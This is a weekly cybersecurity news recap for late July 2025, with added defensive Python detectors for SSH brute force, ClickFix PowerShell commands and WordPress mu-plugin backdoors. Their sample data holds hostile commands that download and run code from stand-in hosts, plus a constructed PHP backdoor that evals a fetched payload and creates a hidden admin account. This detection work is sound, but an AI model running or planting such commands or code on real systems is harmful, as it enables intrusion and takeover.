
Welcome to this week's Cybersecurity Recap, covering the key developments in threats and defenses from July 21-27, 2025.

The week was dominated by an actively exploited zero-day in on-premises Microsoft SharePoint Server that put a large number of organizations at risk, a reminder that internet-facing collaboration software needs the same patch urgency as a VPN appliance.

We also saw targeted intrusions into VMware vSphere environments, a steady stream of new malware campaigns, and several law-enforcement actions against criminal infrastructure.

This recap summarizes each item and what it means for defenders. Let's get into it.

Cyber Attacks

Ransomware Shuts Down 158-Year-Old Logistics Firm After a Weak Password Is Guessed

A single weak password, guessed by attackers, let a ransomware crew into KNP Logistics, a 158-year-old UK haulage firm. The attackers encrypted its systems, the company could not recover, and it closed with the loss of 730 jobs. One guessed credential with no second factor behind it was enough to end the business, which is why password policy, multi-factor authentication and tested offline backups belong in the same conversation.

Read more: https://cybersecuritynews.com/weak-password-destroy-158-year-old-company/

APT41 Attacks African Government with Impacket Tools

The China-linked group APT41 ran a targeted espionage campaign against the IT services of an African government, using Impacket's atexec and wmiexec modules for lateral movement and to drop malware. The payloads had details of the victim's internal network hard-coded into them, and the attackers turned a compromised internal SharePoint server into their command-and-control channel. The campaign marks an uptick in APT41 activity in a region where the group had rarely been seen since late 2022.

Read more: https://cybersecuritynews.com/apt41-hackers-leveraging-atexec/

DeerStealer Malware Spread via Counterfeit Google Authenticator Sites

Threat actors are abusing the Windows Run dialog (the ClickFix technique, where a fake page tells the victim to paste a command) to deliver DeerStealer, an information stealer that harvests browser credentials, cryptocurrency wallets and data from more than 800 browser extensions. The lures are counterfeit download sites for legitimate tools such as Google Authenticator. The malware uses Telegram bots to track victims, is obfuscated to evade detection, and the campaigns typically fetch XOR-encrypted payloads hosted on GitHub.

Read more: https://cybersecuritynews.com/deerstealer-malware-delivered/

US Nuclear Agency Breached via SharePoint Zero-Day Exploits

Unidentified attackers used the Microsoft SharePoint exploit chain to breach the National Nuclear Security Administration (NNSA), the Department of Energy agency responsible for the US nuclear weapons stockpile. A small number of systems were affected; no classified information is reported to have been compromised, and recovery is under way. The agency was previously caught up in the SolarWinds supply-chain compromise attributed to APT29, disclosed in 2020.

Read more: https://cybersecuritynews.com/us-nuclear-weapons-agency-breached/

UNC3944 Abuses VMware vSphere for Ransomware Deployment

UNC3944 (also tracked as Scattered Spider) is social-engineering IT help desks into resetting passwords and granting elevated privileges, then using that access to reach vSphere. Once in, the group modifies the GRUB bootloader to obtain a root shell, plants reverse shells, pulls domain data offline from copied virtual disks, and finally encrypts the virtual machines. Defenses center on phishing-resistant multi-factor authentication for help-desk resets and privileged accounts, and continuous monitoring of vCenter and ESXi hosts.

Read more: https://cybersecuritynews.com/unc3944-attacking-vmware-vsphere/

Gaming Mouse Software Trojanized on the Vendor's Official Site

Endgame Gear's website was compromised and, between late June and mid-July 2025, served trojanized driver software for its OP1w 4K V2 mouse from the official download page. The embedded malware gave attackers remote access and was not flagged by some antivirus products, including Windows Defender at the time. The company quietly replaced the files without a public notice, then advised users to scan their systems. Anyone who downloaded the software in that window should treat the machine as compromised until it has been checked.

Read more: https://cybersecuritynews.com/gaming-mouse-software-compromised/

Threats

Interlock Ransomware Targets Critical Infrastructure

Interlock ransomware, active since September 2024, runs a double-extortion model: data is exfiltrated before encryption, and victims across North America and Europe are threatened with publication. Initial access usually comes from drive-by downloads posing as browser or security-software updates, and from ClickFix lures that trick users into pasting a malicious PowerShell command. Ransom notes direct victims to a .onion site for negotiation. A joint CISA/FBI advisory notes that the encryptor targets virtual machines and leaves physical servers untouched; defenders should deploy EDR, patch internet-facing systems and require multi-factor authentication.

Read more: https://cybersecuritynews.com/interlock-ransomware-attack/

New ClickFake Interview Campaign Uses ClickFix

The ClickFake Interview campaign, attributed to North Korea's Lazarus Group, targets job seekers in the cryptocurrency industry with sites that mimic legitimate interview platforms. It uses the ClickFix technique: a fake error message or CAPTCHA instructs the candidate to run a command, which installs a backdoor on Windows or macOS. ClickFix detections rose 517% between late 2024 and early 2025, and the technique now delivers everything from information stealers to ransomware.

Read more: https://cybersecuritynews.com/new-clickfake-interview-attack-using-clickfix-technique/

Threat Actors Targeting Linux SSH Servers

Poorly maintained Linux SSH servers are being hit with brute-force and dictionary attacks against login credentials. Once in, attackers install DDoS bots, coin miners and scanners; the observed tooling includes ShellBot and XMRig, and the bots scan for open port 22 to find the next victim. Access to compromised systems is sometimes sold on dark-web forums. Recommendations include strong, unique passwords (or better, key-based authentication only), disabling root login over SSH, and firewall rules that restrict which addresses can reach port 22.

Read more: https://cybersecuritynews.com/threat-actors-attacking-linux-ssh-servers/
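As an added example (not part of the original article), the following Python script shows the kind of check a defender can run over an OpenSSH auth log to surface the pattern described above: a burst of failed logins from one address, and the more serious case of a password login succeeding from an address that was just brute-forcing. The log lines are constructed for the example; the threshold and window are assumptions you would tune to the server.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines for the example (not from a real host).
# 203.0.113.7 brute-forces several accounts and then gets in as root;
# 198.51.100.9 is a legitimate user who mistyped once, then used a key.
SAMPLE_AUTH_LOG = """\
Jul 22 03:14:01 web1 sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 51322 ssh2
Jul 22 03:14:03 web1 sshd[2213]: Failed password for invalid user oracle from 203.0.113.7 port 51330 ssh2
Jul 22 03:14:04 web1 sshd[2215]: Failed password for root from 203.0.113.7 port 51341 ssh2
Jul 22 03:14:06 web1 sshd[2217]: Failed password for root from 203.0.113.7 port 51350 ssh2
Jul 22 03:14:08 web1 sshd[2219]: Failed password for invalid user test from 203.0.113.7 port 51362 ssh2
Jul 22 03:14:10 web1 sshd[2221]: Accepted password for root from 203.0.113.7 port 51370 ssh2
Jul 22 03:20:00 web1 sshd[2301]: Failed password for alice from 198.51.100.9 port 40010 ssh2
Jul 22 03:20:30 web1 sshd[2303]: Accepted publickey for alice from 198.51.100.9 port 40012 ssh2
"""

# Matches the OpenSSH "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2$"
)


def parse_events(log_text, year=2025):
    """Turn syslog lines into dicts; syslog has no year, so one is assumed."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # other sshd messages are not needed here
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "ip": m["ip"]})
    return events


def detect(log_text, threshold=5, window_seconds=60):
    """Sliding-window count of failures per source IP.

    Returns the IPs that reached `threshold` failures inside `window_seconds`
    (brute force) and any password login that succeeded from an IP with recent
    failures (the sign that the guessing worked).
    """
    failures = defaultdict(list)   # ip -> failure timestamps still inside the window
    brute_force = {}               # ip -> peak number of failures seen in one window
    success_after_failures = []    # (ip, user, failures seen just before the success)
    for ev in sorted(parse_events(log_text), key=lambda e: e["ts"]):
        recent = [t for t in failures[ev["ip"]]
                  if (ev["ts"] - t).total_seconds() <= window_seconds]
        failures[ev["ip"]] = recent
        if ev["result"] == "Failed":
            recent.append(ev["ts"])
            if len(recent) >= threshold:
                brute_force[ev["ip"]] = max(brute_force.get(ev["ip"], 0), len(recent))
        elif ev["method"] == "password" and recent:
            success_after_failures.append((ev["ip"], ev["user"], len(recent)))
    return {"brute_force": brute_force,
            "success_after_failures": success_after_failures}


if __name__ == "__main__":
    for key, value in detect(SAMPLE_AUTH_LOG).items():
        print(f"{key}: {value}")
```

On the sample data the script reports 203.0.113.7 as a brute-forcer (five failures inside the window) and flags its subsequent password login as root, while alice's single typo followed by a key-based login is ignored. The same logic is what fail2ban applies before banning an address; the "success after failures" case is the one worth an immediate page, because at that point the host should be treated as compromised.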

Lumma Stealer Spread through Fake Cracked Software

Lumma Stealer, sold as malware-as-a-service since 2022, spreads through fake cracked software and keygens promoted via malvertising and search-engine poisoning. Victims download password-protected archives whose loaders run through PowerShell, frequently evading antivirus with open-source evasion tooling. Recent campaigns have targeted organizations worldwide, including telecoms, and increasingly use fake CAPTCHA pages (ClickFix) to start the infection.

Read more: https://cybersecuritynews.com/lumma-stealer-via-fake-cracked-software/
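The Interlock, ClickFake Interview and Lumma items above share the ClickFix delivery step: a PowerShell or mshta one-liner pasted into the Run dialog. As an added example that is not from the original article, this Python triage script scores process-creation records for the traits of such a command: launched from explorer.exe, hidden window, no profile, a download piped into Invoke-Expression, mshta with a remote URL, and a base64 -EncodedCommand, which it decodes (PowerShell expects UTF-16LE) so the hidden command is visible in the alert. The records and domains are constructed; the indicator weights and the alert threshold are assumptions to tune against your own baseline.

```python
import base64
import re


def encode_for_powershell(cmd):
    """Encode a command the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records modelled on Sysmon Event ID 1 fields.
# Domains are reserved .example names; none of this is from a real incident.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": 'powershell -w hidden -nop -c "iex (irm https://captcha-verify.example/ok)"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": "powershell.exe -w hidden -enc " + encode_for_powershell(
         "Invoke-WebRequest https://update.example/x.exe -OutFile $env:TEMP\\x.exe; "
         "Start-Process $env:TEMP\\x.exe")},
    {"parent": r"C:\Windows\System32\services.exe", "image": PS,
     "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta https://verify.example/c.hta"},
]

# (name, weight, pattern); the weights are assumptions, not a published scoring scheme.
INDICATORS = [
    ("inline_exec", 2, re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("web_fetch", 2, re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|"
                                r"downloadstring|downloadfile|net\.webclient)\b", re.I)),
    ("mshta_remote", 3, re.compile(r"\bmshta(?:\.exe)?\s+.*https?://", re.I)),
    ("hidden_window", 1, re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)),
    ("no_profile", 1, re.compile(r"-(?:nop|noprofile)\b", re.I)),
    ("policy_bypass", 1, re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
    ("url", 1, re.compile(r"https?://", re.I)),
]
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
RUN_BOX_PARENTS = {"explorer.exe"}  # the Run dialog (Win+R) spawns children of explorer.exe


def decode_encoded_command(cmd):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Score one process-creation record and list the indicators that matched."""
    hits, score = [], 0
    text = ev["cmd"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        hits.append("encoded_command")
        score += 1
        # Swap the blob for the decoded command so the other patterns can see it.
        text = ENC_RE.sub("-EncodedCommand <decoded>", text) + "\n" + decoded
    for name, weight, rx in INDICATORS:
        if rx.search(text):
            hits.append(name)
            score += weight
    parent_name = ev["parent"].lower().rsplit("\\", 1)[-1]
    if parent_name in RUN_BOX_PARENTS:
        hits.append("launched_from_shell")
        score += 2
    return {"score": score, "hits": hits, "decoded": decoded}


def triage(events, threshold=4):
    """Return the records worth an analyst's attention, highest score first."""
    scored = [dict(ev, **score_event(ev)) for ev in events]
    return sorted((s for s in scored if s["score"] >= threshold),
                  key=lambda s: s["score"], reverse=True)


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["score"], alert["hits"], alert["cmd"][:60])
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

On the sample records the three explorer.exe-spawned commands are flagged and the scheduled backup script run by services.exe is not, even though it uses -ExecutionPolicy Bypass. The parent-process signal is what separates a pasted ClickFix command from routine administration, so keep it when adapting the weights.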

Stealthy Backdoor Hidden in WordPress mu-plugins

A newly reported backdoor hides in WordPress's wp-content/mu-plugins directory. "Must-use" plugins placed there load automatically on every request and cannot be deactivated from the admin panel, so the file is easy to overlook. The backdoor decodes a ROT13-obfuscated remote URL, stores the downloaded payload in the database and evaluates it, and creates a hidden administrator account for persistence. With that foothold the attackers can install further plugins, wipe logs and regain control after a cleanup that misses the mu-plugins file.

Read more: https://cybersecuritynews.com/stealthy-backdoor-in-wordpress-plugins/
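Added example, not from the original article or the researchers' report: a small Python scanner for the wp-content/mu-plugins directory that flags the traits described above, decodes any string literal passed to str_rot13() so the hidden URL is visible, and scores each file. The two sample plugin files are constructed for the example (one benign, so the scoring can be compared); the indicator weights are assumptions.

```python
import codecs
import os
import re

# Constructed sample mu-plugin files (not real malware; the domain is a reserved .example name).
SAMPLE_FILES = {
    "wp-content/mu-plugins/disable-xmlrpc.php": """<?php
/* Plugin Name: Disable XML-RPC */
add_filter('xmlrpc_enabled', '__return_false');
""",
    "wp-content/mu-plugins/wp-core-helper.php": """<?php
/* Plugin Name: WP Core Helper */
$s = str_rot13('uggcf://pqa.rknzcyr/cnlybnq.gkg');
$c = @file_get_contents($s);
update_option('_wp_helper_cache', base64_encode($c));
eval(base64_decode(get_option('_wp_helper_cache')));
add_action('init', function () {
    if (!username_exists('wp_support')) {
        $id = wp_create_user('wp_support', 'Str0ngP@ss', 'x@cdn.example');
        (new WP_User($id))->set_role('administrator');
    }
});
""",
}

# (name, weight, pattern); weights are assumptions chosen so that any eval() alone is suspicious.
INDICATORS = [
    ("eval", 3, re.compile(r"\beval\s*\(")),
    ("rot13", 2, re.compile(r"\bstr_rot13\s*\(")),
    ("base64_decode", 1, re.compile(r"\bbase64_decode\s*\(")),
    ("remote_fetch", 2, re.compile(r"\b(?:file_get_contents|curl_exec|wp_remote_get)\s*\(\s*\$")),
    ("payload_in_db", 1, re.compile(r"\b(?:update_option|add_option)\s*\(")),
    ("user_creation", 2, re.compile(r"\b(?:wp_create_user|wp_insert_user)\s*\(")),
    ("admin_role", 3, re.compile(r'''set_role\s*\(\s*['"]administrator['"]''')),
]
# A quoted literal handed straight to str_rot13(); decoding it reveals the real string.
ROT13_LITERAL = re.compile(r'''str_rot13\s*\(\s*(['"])(.*?)\1\s*\)''')


def scan_source(src):
    """Score one PHP file's source and decode any ROT13 literals found in it."""
    hits = [name for name, _, rx in INDICATORS if rx.search(src)]
    score = sum(weight for name, weight, _ in INDICATORS if name in hits)
    decoded = [codecs.decode(m.group(2), "rot_13") for m in ROT13_LITERAL.finditer(src)]
    return {"score": score, "indicators": hits, "decoded_rot13": decoded}


def scan_files(files):
    """files: {path: source}. Returns {path: report}."""
    return {path: scan_source(src) for path, src in files.items()}


def suspicious(report, threshold=3):
    """Paths whose score reaches the threshold, sorted for stable output."""
    return sorted(path for path, r in report.items() if r["score"] >= threshold)


def scan_directory(wordpress_root):
    """Read every .php file under wp-content/mu-plugins of a real install and scan it."""
    files = {}
    base = os.path.join(wordpress_root, "wp-content", "mu-plugins")
    for dirpath, _, names in os.walk(base):
        for name in names:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan_files(files)


if __name__ == "__main__":
    report = scan_files(SAMPLE_FILES)
    for path in suspicious(report):
        r = report[path]
        print(f"{path}: score={r['score']} {r['indicators']} rot13={r['decoded_rot13']}")
```

Run `scan_directory("/var/www/html")` (path assumed) against a real install; the benign sample scores zero while the backdoor scores on every indicator, and the decoded literal shows the payload URL that the ROT13 layer was hiding. Because the file survives plugin reinstalls, the cleanup must also remove the stored option and the extra administrator account it created.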

SharePoint Zero-Day Exploited in Ransomware Attacks

A zero-day in on-premises Microsoft SharePoint Server, CVE-2025-53770, has been exploited since at least July 18, 2025, with more than 400 organizations affected, including US government bodies. A threat actor Microsoft tracks as Storm-2603 has used the access to deploy Warlock ransomware, moving from espionage-style intrusion to encryption and extortion. Microsoft has released emergency patches; apply them immediately, and treat any internet-facing SharePoint server that was unpatched during this window as potentially compromised rather than merely vulnerable.

Read more: https://cybersecuritynews.com/sharepoint-0-day-ransomware-attack/

Vulnerabilities

CISA Warns of Microsoft SharePoint Server Zero-Day RCE Exploitation

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the actively exploited Microsoft SharePoint Server zero-day, CVE-2025-53770, to its Known Exploited Vulnerabilities catalog. The flaw allows unauthenticated remote code execution on on-premises SharePoint servers, giving attackers access to stored documents and a foothold for malware deployment. Microsoft has published out-of-band security updates for supported versions. Because the exploit chain steals the server's ASP.NET machine keys, Microsoft also advises rotating those keys and restarting IIS after patching; otherwise an attacker who already holds the keys can keep forging requests to a patched server.

Read more: https://cybersecuritynews.com/cisa-microsoft-sharepoint-server-0-day-rce/

Researchers Reveal SS7 Protocol Bypass Attack Technique

Researchers have described a new technique for bypassing protections in Signaling System 7 (SS7), the signaling protocol mobile networks use for call routing and SMS delivery. By manipulating signaling messages, an attacker can intercept calls and texts, impersonate subscribers or disrupt service while slipping past the filtering that operators have deployed. The technique has been observed in targeted espionage campaigns; operators are advised to tighten SS7 firewall rules and monitoring. For everyone else it is one more reason not to rely on SMS one-time codes as the only second factor.

Read more: https://cybersecuritynews.com/ss7-bypass-attack/

Cisco ISE RCE Vulnerabilities Actively Exploited in the Wild

Cisco has confirmed that attackers are actively attempting to exploit several critical RCE vulnerabilities in Identity Services Engine (ISE): CVE-2025-20281, CVE-2025-20282 and CVE-2025-20337. They are unauthenticated and allow arbitrary code execution as root, which means full compromise of the appliance that decides who gets onto the network. Fixes are available for ISE 3.3 and 3.4. Cisco's advisory was revised to add CVE-2025-20337 after the first fixes shipped, so verify the installed patch level against the current advisory rather than assuming an earlier update covers all three.

Read more: https://cybersecuritynews.com/cisco-ise-rce-vulnerability-exploited-in-wild/

Google Chrome Hit by Type Confusion Attacks in V8 Engine

A high-severity type confusion bug in Chrome's V8 JavaScript engine (CVE-2024-12053) can be triggered by a crafted web page to execute code in the renderer, the usual first stage of a drive-by attack, and is reported as exploited. Google fixed it in Chrome 131.0.6778.108. Check chrome://settings/help to confirm the browser has actually updated, and remember that other Chromium-based browsers ship the fix on their own schedules.

Read more: https://cybersecuritynews.com/chrome-type-confusion-attacks/

Mozilla Releases Firefox 141 with Fixes for Serious Vulnerabilities

Firefox 141 fixes 18 vulnerabilities, including high-severity memory-safety bugs and JavaScript engine flaws such as CVE-2025-8027 and CVE-2025-8028, which could lead to arbitrary code execution or privilege escalation on 64-bit platforms. Moderate-severity fixes include sandbox bypasses. Update Firefox, and Firefox ESR where it is deployed, now.

Read more: https://cybersecuritynews.com/firefox-141-released-fix-for-vulnerabilities/

SonicWall SMA 100 Series Exposed to Critical RCE Vulnerability

SonicWall has patched a critical authenticated RCE flaw, CVE-2025-40599, in SMA 100 series appliances, caused by unrestricted file upload in the web management interface. An attacker holding admin credentials can upload and execute arbitrary files. No exploitation of this bug has been reported yet, but SMA 100 devices are already under attack through other means, so admin credentials on these appliances should be assumed to be a target. Update to the fixed firmware version listed in SonicWall's advisory and rotate the admin credentials while you are at it.

Read more: https://cybersecuritynews.com/sonicwall-sma-100-vulnerabilities/

Other Updates

Wireshark 4.4.8 Released with Bug Fixes

Wireshark 4.4.8 is a maintenance release focused on stability and protocol dissector updates. It fixes several bugs, including crashes in Bluetooth PID handling and assertion failures found by fuzz testing. It carries forward the 4.4 line's features such as automatic profile switching and improved display-filter support. Builds are available for Windows and macOS, plus source code. A dissector crash is a denial of service against the analyst opening the capture, so keep Wireshark current on any workstation used to open untrusted pcaps.

Read more: https://cybersecuritynews.com/wireshark-4-4-8-released/

Kali Linux Adds Native Raspberry Pi Wi-Fi Monitor Mode

Kali Linux has added two packages, brcmfmac-nexmon-dkms and firmware-nexmon, that enable monitor mode and packet injection on the Raspberry Pi's built-in Wi-Fi. They use the Nexmon firmware-patching framework to work around the limitations of the Broadcom/Cypress chipsets, so wireless assessments no longer require an external USB adapter. Installation is a single package install on supported models, including the Raspberry Pi 5.

Read more: https://cybersecuritynews.com/kali-linux-new-wi-fi-packages/

Administrator of Major Russian-Language Cybercrime Forum Arrested

Ukrainian authorities, working with French police and Europol, have arrested the suspected administrator of XSS.is, one of the most prominent Russian-language cybercrime forums, with more than 50,000 users. The forum brokered stolen data, hacking tools and ransomware affiliate services, and the administrator is estimated to have earned around €7 million from it. The arrest caps a four-year investigation; the suspect is also linked to a private messaging service used by criminals.

Read more: https://cybersecuritynews.com/key-admin-russian-cybercrime-forum/

WhoFi: AI Wi-Fi Technique Tracks People Without Cameras

Researchers have presented WhoFi, an AI system that re-identifies and tracks people from Wi-Fi signals alone with up to 95.5% accuracy. It models how a body perturbs channel state information (CSI) and turns that perturbation into a biometric signature, much like a fingerprint. Because it needs no camera and works through walls, and can also pick out gestures, it raises obvious privacy concerns for covert surveillance.

Read more: https://cybersecuritynews.com/new-ai-powered-wi-fi-biometrics-whofi-tracks-humans/

BreachForums Back Online After FBI Seizure

BreachForums, the successor to RaidForums, is back online under the same domains, reportedly restored by the ShinyHunters group despite an FBI seizure earlier this month. The site, a marketplace for stolen data and malware, had been briefly defaced by law enforcement, but its operators regained control through an appeal to the domain registrar. It is the forum's latest of several revivals.

Read more: https://cybersecuritynews.com/breachforums-back-online/

Bulletproof Hosting Provider Aeza Moves Its Infrastructure

Aeza Group, a bulletproof hosting provider sanctioned by the U.S. Treasury, has moved more than 2,100 IP addresses to a new autonomous system, AS211522, in an apparent attempt to sidestep OFAC sanctions. The move, spotted on July 20, 2025, shifts the infrastructure to Hypercore LTD so that ransomware and other criminal customers keep their hosting. Defenders who block on Aeza's previous network ranges should extend those blocks to the new AS.

Read more: https://cybersecuritynews.com/bulletproof-hosting-provider-shifting-infrastructure/
